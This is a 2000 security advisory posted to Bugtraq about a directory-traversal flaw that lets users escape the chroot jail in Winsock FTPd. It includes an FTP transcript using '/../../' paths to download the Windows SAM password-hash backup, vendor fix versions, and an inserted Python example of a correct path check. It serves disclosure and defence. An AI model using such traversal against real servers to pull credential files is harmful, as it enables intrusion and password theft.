Vulnerability in Winsock FTPD 2.41/3.00 (Pro)
daemon@ATHENA.MIT.EDU (Interstellar Overdrive)
Tue Nov 28 17:19:27 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3A227BEA.1969E6B0@home.com>
Date: Mon, 27 Nov 2000 17:21:15 +0200
Reply-To: Interstellar Overdrive <interdrive@HOME.COM>
From: Interstellar Overdrive <interdrive@HOME.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
[ Overdrive Advisory # 1 ]
---------------------------[ Synopsis ]
Subject : Vulnerability in Winsock ftpd
Application : Winsock FTPd v2.41 RC14, Winsock FTPd v2.41 Pro,
Winsock FTPd v3.00 Pro
Platform : Win32
Description : a local user can break the chroot jail
Date : 11/28/2000
Author : Interstellar Overdrive
E-Mail : overdrive@workspot.net
WWW : http://www.workspot.net/~overdrive/
--------------------------[ Application Info ]
Winsock FTPd is a popular FTP server for Windows 95/98/3.11/NT/2K by Texas Imperial Software. It is a simple, inexpensive, and easy-to-set-up FTP server for Windows machines; the current release is v3.0.
Homepage : http://www.wftpd.com
Author : Alun Jones <alun@texis.com>
-------------------------[ Overview ]
In Winsock FTPd there is an option called "Restrict to home directory and below", where the server makes a chroot jail for the user. Let's take an example:
-----snip------
c:>ftp target.com
Connected to target.com
User (target.com:(none)): io
331 Give me your password, please
Password: XXXXXX
230 Logged in successfully
ftp>pwd
257 "/" is current directory #io's directory here c:\wftpd\io
#and it is chroot'ed
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
my_file.txt
my_code.c
226 Transfer finished successfully.
11 Bytes received in 0.01 seconds (1.10 Kbytes/sec)
ftp>cd ../../
501 User is not allowed to change to ../../ - returning to /.
ftp>
#until now chroot jail working fine...
#hmmm, lets try doing 'cd /../../'
ftp>cd /../../
250 "/../.." is current directory
ftp>ls
200 PORT command okay
150 File Listing Follows in ASCII mode.
wftpd
inetpub
DOS
WINA20.386
CONFIG.DOS
CONFIG.SYS
WINNT
AUTOEXEC.BAT
Program Files
TEMP
COMMAND.COM
.....etc # cool !
#even more fun
ftp>cd /../../WINNT/repair/
250 "/../../WINNT/repair/" is current directory
ftp>get /../../WINNT/repair/sam._
200 PORT command okay.......etc we got the file...
---------snap-------
The problem is that the chroot jail only works if the user tries ../../../ and not /../../../. By simply adding a "/" before ../../ (a commonly known bug in Win32 applications), any local user, or even an anonymous user, can change his working directory to any directory on the server and download any file from it (as you saw above).
In other words, the chroot jail is broken.
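The root cause above is a containment check that looks for a leading "../" instead of resolving the whole client-supplied path. The following is an added example, not code from the advisory or from WFTPD, of how a server-side check should handle both forms: every path component is walked, any ".." that would step above the virtual root is rejected, and the mapped physical path is verified a second time under the user's home directory. The function names, the home directory C:\wftpd\io (taken from the transcript) and the replayed command list are illustrative assumptions.

```python
"""Containment check for client-supplied FTP virtual paths.

Added example (not part of the advisory or of WFTPD): rejects both the
"../.." form the server caught and the "/../.." form it did not. All
names are illustrative; the replayed session is constructed from the
CWD arguments shown in the advisory.
"""
import ntpath


def resolve_virtual_path(cwd, requested):
    """Resolve `requested` against the virtual cwd and return the
    normalized virtual path (always rooted at "/"), or None if any ".."
    would step above the virtual root.

    Unlike a test for a leading "../", this walks every component, so
    "/../..", "sub/../..", "\\..\\.." and "./../.." are all caught.
    """
    # Win32 accepts backslash as a separator; fold it into "/" so the
    # loop below only has to deal with one separator.
    requested = requested.replace("\\", "/")
    # An absolute virtual path replaces cwd; a relative one extends it.
    if requested.startswith("/"):
        parts = []
    else:
        parts = [c for c in cwd.split("/") if c not in ("", ".")]
    for comp in requested.split("/"):
        if comp in ("", "."):
            continue                  # empty component or "." changes nothing
        if comp == "..":
            if not parts:
                return None           # would leave the virtual root: reject
            parts.pop()
            continue
        if ":" in comp:
            return None               # drive letter / ADS syntax is never a valid name here
        parts.append(comp)
    return "/" + "/".join(parts)


def map_to_physical(root, virtual_path):
    """Map a normalized virtual path onto the user's home directory and
    confirm the result still lies under it (defence in depth: the mapped
    path is checked even though the lexical check already passed)."""
    parts = [c for c in virtual_path.split("/") if c]
    physical = ntpath.normpath(ntpath.join(root, *parts))
    try:
        inside = ntpath.commonpath([root, physical]) == ntpath.normpath(root)
    except ValueError:                # different drives: cannot be inside root
        inside = False
    return physical if inside else None


def replay_session(home, cwd, commands):
    """Replay a list of CWD arguments and return (argument, resulting virtual
    cwd or None) pairs; None means the server should answer 501 and keep
    the current directory unchanged."""
    results = []
    for arg in commands:
        virtual = resolve_virtual_path(cwd, arg)
        if virtual is not None and map_to_physical(home, virtual) is not None:
            cwd = virtual
            results.append((arg, virtual))
        else:
            results.append((arg, None))
    return results


if __name__ == "__main__":
    # Constructed input: the CWD arguments from the advisory's transcript,
    # plus the backslash variant and one legitimate relative path.
    session = ["../../", "/../../", "/../../WINNT/repair/", "\\..\\..", "sub/../docs/"]
    for arg, result in replay_session("C:\\wftpd\\io", "/", session):
        status = "501 rejected" if result is None else "250 " + result
        print(f"CWD {arg!r:26} -> {status}")
```

Note that `resolve_virtual_path` deliberately rejects an escape attempt rather than silently clamping it at "/": a 501 response keeps the client's working directory where it was and gives the administrator a log line to alert on, whereas clamping would make "/../../WINNT" quietly behave like "/WINNT".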
Vulnerable Winsock FTPd Applications Found :
Winsock FTPd v2.41 RC14
Winsock FTPd v2.41 RC14 Pro
Winsock FTPd v3.00 Pro
-----------------------------[ FIX ]
Vendor contacted; a new release of Wftpd is out which fixes the problem:
- Wftpd v2.41 RC15
- Wftpd v3.00 R2
<http://www.wftpd.com>
-----------------------------[ Credits ]
Interstellar Overdrive (interdrive@home.com - overdrive@workspot.net)